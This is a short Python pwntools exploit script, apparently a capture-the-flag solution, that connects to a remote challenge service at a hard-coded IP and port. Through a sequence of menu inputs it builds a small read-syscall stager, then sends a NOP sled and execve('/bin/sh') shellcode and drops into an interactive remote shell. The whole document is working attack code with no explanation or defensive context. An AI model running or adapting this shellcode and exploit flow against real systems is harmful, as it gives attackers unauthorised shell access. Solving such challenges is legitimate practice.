#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 1243)

# funcs
s = lambda a: r.sendline(a)
inc = lambda: r.sendline(b"2")

# read
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
s(b"4")
s(b"3")
s(b"5") # 89
inc()
for i in range(2): s(b"4")
for i in range(2): s(b"3")
for i in range(5): s(b"6")
s(b"5") # d6
inc()
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
for i in range(4): s(b"3")
for i in range(6): s(b"6")
s(b"5") # 31
inc()
for i in range(2): s(b"4")
for i in range(3): s(b"6")
s(b"3")
s(b"5") # d2
inc()
for i in range(2): s(b"4")
for i in range(9): s(b"6")
for i in range(2): s(b"3")
s(b"5") # b2
inc()
for i in range(17): s(b"5") # ff
inc()
s(b"5") # 0f
inc()
for i in range(2): s(b"3")
s(b"5")
for i in range(6): s(b"6") # 05
s(b"7")

# execve
sc = """
lea rdi, [rsi+35]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
s(sc)

r.interactive()